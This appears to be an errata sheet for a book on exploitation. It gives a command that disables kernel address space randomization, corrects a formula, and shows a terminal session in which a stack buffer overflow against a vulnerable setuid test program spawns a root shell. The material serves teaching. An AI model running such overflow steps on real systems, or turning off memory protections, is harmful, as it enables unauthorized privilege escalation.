- Due to an update in the kernel, address space randomization needs to be turned off for the basic exploits to work.
To turn off the randomization:
# echo 0 > /proc/sys/kernel/randomize_va_space
- All occurrences of the algorithm 2n + 365 on pages 177 and 178 need to be changed to 2n + 1745.
- Because Redhat has the LANG environment variable set to utf-8, which makes bytes like \xff output as something else, Red Hat users need to unset LANG before doing any exploits that use commandline perl. This can be done in the following manner (bold face indicates command line entry):
$ env | grep LANG
LANG=en_US.UTF-8
$ export MATRIX=`cat shellcode`
$ ./gete2 MATRIX
MATRIX is located at 0xbffffdd8
$ ./vuln2 `perl -e 'print "\xd8\xfd\xff\xbf"x8;'`
Segmentation fault
$ unset LANG
$ ./gete2 MATRIX
MATRIX is located at 0xbffffde9
$ ./vuln2 `perl -e 'print "\xe9\xfd\xff\xbf"x8;'`
sh-2.05b# id
uid=0(root) gid=500(matrix) groups=500(matrix)
sh-2.05b# exit
|
